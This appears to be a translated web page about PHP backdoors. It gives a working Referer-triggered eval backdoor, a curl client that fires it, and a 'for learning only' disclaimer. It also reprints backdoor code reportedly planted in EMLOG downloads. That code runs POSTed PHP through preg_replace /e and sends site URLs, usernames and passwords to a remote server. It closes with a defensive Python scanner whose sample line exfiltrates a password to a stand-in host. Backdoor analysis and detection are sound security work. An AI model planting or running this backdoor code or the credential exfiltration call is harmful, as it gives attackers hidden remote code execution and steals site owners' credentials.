Local test results are below.

This program is for learning purposes only; please do not use it for anything malicious.

The code is as follows:


<?php
// 1.php (the backdoor)
header('Content-Type: text/html; charset=utf-8');
// Parse the Referer header as a query string into $a
parse_str($_SERVER['HTTP_REFERER'], $a);
// Trigger only when the first value is '10' and there are exactly 9 parameters
if (reset($a) == '10' && count($a) == 9) {
    // Join the values from the 7th onward, base64-decode them and execute the result
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}

<?php
// 2.php (the client that triggers the backdoor)
header('Content-Type: text/html; charset=utf-8');
// code to execute
$code = <<<CODE
phpinfo();
CODE;

// base64-encode the code
$code = base64_encode($code);
// construct the referer string
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";

// URL of the backdoor
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);

The EMLOG source was polluted recently with a backdoor; some users downloaded a copy containing the following code.

The code is as follows:


if (isset($_GET["RSDSRV"])) {
    if ($_GET["RSDSRV"] == "20c6868249a44b0ab92146eac6211aeefcf68eec") {
        // The /e modifier makes preg_replace() evaluate the replacement (POST data) as PHP code
        @preg_replace("//e", $_POST['IN_EMLOG'], "Unauthorization");
    }
}
// Sends the site URL, username and password to a remote server (domain elided in the original)
file_get_contents("http://<a domain name>/?url=" . base64_encode($_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']) . "&username=" . base64_encode($username) . "&password=" . base64_encode($password));
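
To check a PHP code base for the constructs shown in the two samples above, a source scanner along these lines can be used. It is an added example, not code from the original page or from EMLOG; the rule names, function names, the `collector.example` host and both sample strings are constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic rules for the constructs in the samples above (rule names are this example's own).
RULES = {
    # eval() applied directly to base64-decoded data
    "eval-base64": re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I),
    # a request header unpacked into variables with parse_str()
    "parse-str-header": re.compile(r"\bparse_str\s*\(\s*\$_SERVER\s*\[\s*['\"]\s*HTTP_", re.I),
    # preg_replace() whose pattern ends in modifiers containing e (evaluate replacement)
    "preg-replace-e": re.compile(
        r"\bpreg_replace\s*\(\s*['\"][^'\"]*[^\w\s'\"][a-z]*e[a-z]*['\"]\s*,", re.I),
    # an outbound HTTP fetch whose URL expression includes $password
    "password-in-url": re.compile(
        r"\bfile_get_contents\s*\(\s*['\"]https?://[^;]*\$password\b", re.I),
}

def scan_source(text):
    """Return sorted (line_number, rule_name) pairs for every rule hit in PHP source."""
    hits = []
    for name, rx in RULES.items():
        for m in rx.finditer(text):
            hits.append((text.count("\n", 0, m.start()) + 1, name))
    return sorted(hits)

def scan_tree(root):
    """Scan every *.php file under root; return {path: hits} for files with hits."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: one mirrors the snippets on this page, one is ordinary code.
SUSPICIOUS = """<?php
parse_str($_SERVER['HTTP_REFERER'], $a);
eval (base64_decode(implode(array_slice($a, 6))));
@preg_replace("//e", $_POST['IN_EMLOG'], "Unauthorization");
file_get_contents("http://collector.example/?u=" . base64_encode($username)
    . "&p=" . base64_encode($password));
"""
BENIGN = """<?php
parse_str($_SERVER['QUERY_STRING'], $q);
echo preg_replace("/\\s+/", " ", $q['title']);
"""

if __name__ == "__main__":
    for line, rule in scan_source(SUSPICIOUS):
        print(f"line {line}: {rule}")
```

Hits are leads for manual review, not verdicts. The `/e` modifier was removed in PHP 7.0, so the `preg_replace` line only executes code on older PHP versions, but its presence in a source tree is still worth investigating.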

